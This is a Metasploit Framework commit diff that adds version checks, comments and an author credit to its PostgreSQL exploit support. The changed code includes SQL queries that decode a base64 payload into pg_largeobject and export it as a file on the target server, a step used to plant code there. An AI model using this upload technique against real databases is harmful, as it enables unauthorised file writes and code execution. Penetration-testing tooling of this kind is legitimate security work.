Raise if the version isn't what we expect

Also adds some clarifying commentation and adds todb to the list of
authors since he wrote the original module for windows upon which this
one is based.
bug/bundler_fix
James Lee 2012-10-18 15:55:55 -05:00
parent 3c5c1cd86e
commit 1eccb24bf8
2 changed files with 11 additions and 1 deletions

View File

@ -332,17 +332,26 @@ module Exploit::Remote::Postgres
ver = postgres_fingerprint ver = postgres_fingerprint
case ver[:auth] case ver[:auth]
when /PostgreSQL 8\./ when /PostgreSQL 8\./
# 8.x inserts the largeobject into the table when you do the
# lo_create, so we with a value.
queries = [ queries = [
"select lo_create(#{oid})", "select lo_create(#{oid})",
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}", "update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
"select lo_export(#{oid}, '#{remote_fname}')" "select lo_export(#{oid}, '#{remote_fname}')"
] ]
when /PostgreSQL 9\./ when /PostgreSQL 9\./
# 9.x does *not* insert the largeobject into the table when you do
# the lo_create, so we must insert it ourselves.
queries = [ queries = [
"select lo_create(#{oid})", "select lo_create(#{oid})",
"insert into pg_largeobject select #{oid}, 0, decode((select #{fld} from #{tbl}), 'base64')", "insert into pg_largeobject select #{oid}, 0, decode((select #{fld} from #{tbl}), 'base64')",
"select lo_export(#{oid}, '#{remote_fname}')" "select lo_export(#{oid}, '#{remote_fname}')"
] ]
else
# Since the technique required for uploading seems to change
# between versions, complain that we don't know how to do it for
# an unknown version.
raise RuntimeError.new("Unknown Postgres version, don't know how to upload files")
end end
queries.each do |q| queries.each do |q|

View File

@ -38,7 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'midnitesnake', # this Metasploit module 'midnitesnake', # this Metasploit module
'egypt' # .so technique 'egypt', # on-the-fly compiled .so technique
'todb' # original windows module this is based on
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Version' => '$Revision$',